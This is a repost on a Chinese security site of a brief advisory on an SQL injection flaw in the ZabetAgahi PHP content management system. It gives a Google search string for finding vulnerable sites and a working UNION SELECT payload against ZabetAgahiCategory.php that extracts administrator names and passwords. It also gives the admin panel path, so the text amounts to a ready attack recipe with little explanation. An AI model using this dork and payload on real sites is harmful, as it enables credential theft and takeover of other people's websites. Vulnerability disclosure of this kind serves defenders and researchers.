ZabetAgahi SQL 注入漏洞

admin
admin
admin
140350
文章
117
评论
2021年4月3日19:44:02评论27 views字数 614阅读2分2秒阅读模式

By:追心

漏洞说明:

    ZabetAgahi是一款国外的基于PHP+MYSQL的内容管理系统,ZabetAgahi 由于设计上的缺陷,导致SQL注入漏洞。

漏洞类型:

    sql注入、sql盲注、脚本盲注、注入漏洞

谷歌关键词:

    inurl:ZabetAgahiCategory.php?cid=

漏洞文件:

    ZabetAgahiCategory.php

漏洞测试:

    http://www.baidu.com/ZabetAgahiCategory.php?cid=[SQL]
    http://www.baidu.com/ZabetAgahiCategory.php?cid=-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--

后台地址:

    http://www.baidu.com/AdminZabetAgahi/AdminZabetAgahiHome.php

文章来源于lcx.cc:ZabetAgahi SQL 注入漏洞

相关推荐: Html 使用Java脚本获取当前页面所有脚本地址

Html 使用Java脚本获取当前页面所有脚本地址: javascript:var h="";for(i=0; i";x=window.open("about");x.document.write(h);     使用方法,极其简单。当打开指定页面后,在地址栏…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:44:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ZabetAgahi SQL 注入漏洞https://cn-sec.com/archives/324650.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息